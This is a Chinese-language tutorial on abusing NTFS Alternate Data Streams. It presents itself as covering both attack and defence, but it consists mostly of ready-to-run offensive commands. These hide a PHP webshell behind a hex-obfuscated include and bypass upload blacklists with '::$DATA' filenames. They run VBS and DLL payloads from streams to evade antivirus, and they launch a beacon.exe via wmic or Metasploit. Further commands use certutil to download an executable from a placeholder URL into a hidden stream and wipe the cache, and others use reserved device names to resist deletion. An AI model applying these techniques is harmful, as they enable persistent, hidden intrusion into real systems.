借用 NTFS 交换数据流 实现隐藏文件

0x01 简介

NTFS交换数据流（Alternate DataStreams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上。利用ADS数据流，我们可以做很多有趣的事情，同时对于企业安全来说这类问题也隐藏着巨大的风险。本文主要讨论利用方式以及如何防御这类攻击。

在NTFS分区创建ADS数据流文件有两种形式：一是指定宿主文件；二是创建单独的ADS文件。

常用的创建命令有两个： echo 和 type ，echo 用于输入常规字符，type 则用于将文件附加到目标文件

type *.txt > C:\目标路径\合并后的文件名.txt

0x02 使用方法

2.1 指定宿主文件

这类情况可以使用以下命令创建目标文件：

echo 3628 > 1.txt:flag.txt 

正常情况文件无法查看到，可以使用命令：

dir /r

文件内容可以使用命令:

notepad 1.txt:flag.txt

进行查看和编辑：

此类文件可以通过直接删除宿主文件清除。

2.2 单独的ADS数据流文件

这类可以通过以下命令来进行创建：

echo hide > :mo.txt 

创建之后在目录下无文件，也没有依赖的宿主文件，并且此类文件在当前目录命令行下是无法查看的，因为它是依赖于文件夹的ADS数据流文件：

因此需要退到上级目录进行查看：

cd ../
notepad test:mo.txt

像这类文件的清除一种是通过删除文件夹的方式，但是假如这个文件是创建在系统根目录如何进行处理，此时需要用到 WinHex中的Open Disk功能，直接可以查看到相应的文件，删除即可。

0x03 Webshell后门

由于 windows xp 之后的系统对于 ADS 文件都没有执行权限，因此隐藏此类 webshell 需要用到文件包含来进行配合。

首先创建被包含文件：index.php:mo.txt

echo ^<?php phpinfo();?^> > mo.txt

然后参考这里给文件名进行一下HEX编码，以免被查，Hex之后通过利用 PHP 可变变量进行二次转换。

696E6465782E7068703A6D6F2E747874 为 index.php:mo.txt 的 hex 编码，最后创建一个包含中介 test.php 中内容如下:

<?php 
$a="696E6465782E7068"."703A6D6F2E747874";
$b="a";
include(PACK('H*',$$b))
?>

访问test.php即可：

0x04 文件上传

这里当然也可以借助此数据流实现 Bypass 上传黑名单验证，因为在我们上传数据流文件时，形如 test.php::$DATA 、test.php:a.txt 这样的后缀， windows 系统必定需要创建一个对应的宿主文件 test.php ，同时假设我们需要上传的文件内容为：

<?php phpinfo();?>

下面是上传是会出现的现象：

上传的文件名	服务器表面现象	生成的文件内容
test.php:a.jpg	生成test.php	空
test.php::$DATA	生成test.php	<?php phpinfo();?>
test.php::$INDEX_ALLOCATION	生成test.php文件夹	\
test.php::$DATA\0.jpg	生成0.jpg	<?php phpinfo();?>

可以注意到上传文件名为 Test.php::$INDEX_ALLOCATION 时会生成对应的文件夹，利用此种特性也可以用于突破 UDF 提权时遇到无法创建文件夹的问题。

0x05 病毒免杀

前面提到过在 windows xp 03 之后的版本的数据流文件都被禁止了执行权限，因此可以使用 wscript 来运行 vbs ，在 C 盘根目录使用命令：

type 1.vbs > :2.vbs

创建了依赖C盘存在的数据流文件 c::2.vbs ，没有工具是无法清除的，同时这样生成的恶意文件是暂时可以通过部分安全厂商的查杀：

使用以下命令可以成功执行vbs：

wscript c::2.vbs

当然除了运行vbs之外，也可以使用dll文件：

type test.dll > 1.txt:ms
regsvr32 1.txt:ms

清除方式：用winhex或者删除宿主文件都可以直接清除，借助相关工具如 IceSword 也可进行删除。

0x06 实战总结

6.1 通过文件上传执行

$pwd
c:\WINDOWS\debug\WIA

#上传
$upload /tmp/beacon.exe \\\\.\\c:\\WINDOWS\\debug\\WIA\\test:aa.exe
$upload /tmp/beacon.exe test:aa.exe (当前目录下)

$dir /r

#执行
$wmic process call create \\.\c:\WINDOWS\debug\WIA\test:aa.exe
$wmic process call create C:\WINDOWS\debug\WIA\test:aa.exe  (当前目录使用，仍需绝对路径)

$execute -cH -f "\\\\.\\c:\\WINDOWS\\debug\\WIA\\test:aa.exe" (也可以使用msf来执行)

6.2 通过文件下载执行

使用certutil下载文件到ADS:

$certutil -urlcache -split -f http://url/test.exe \\.\c:\WINDOWS\debug\WIA\test:aa.exe

#删除certutil缓存:
$certutil.exe -urlcache -split -f http://url/test.exe delete

6.3 进一步隐藏

测试发现，如果想要dir /s 里面看不到ADS，可以使用的文件名称为：

\\.\C:\test\COM1
\\.\C:\test\COM2
\\.\C:\test\COM3-8
\\.\C:\test\COM9
\\.\C:\test\nul

并且这些文件是不可以直接在UI界面删除的，要删除的话使用如下命令：

del \\.\C:\test\nul

6.4 带参数执行ADS文件

#可借助MSF，其他的也可以
$execute -iH -f "c:\\文件路径\\test:1.exe" -a "文件参数"

0x07 参考链接

https://evi1cg.me/archives/ADS.html
https://www.freebuf.com/articles/terminal/195721.html
https://blog.csdn.net/nzjdsds/article/details/81260524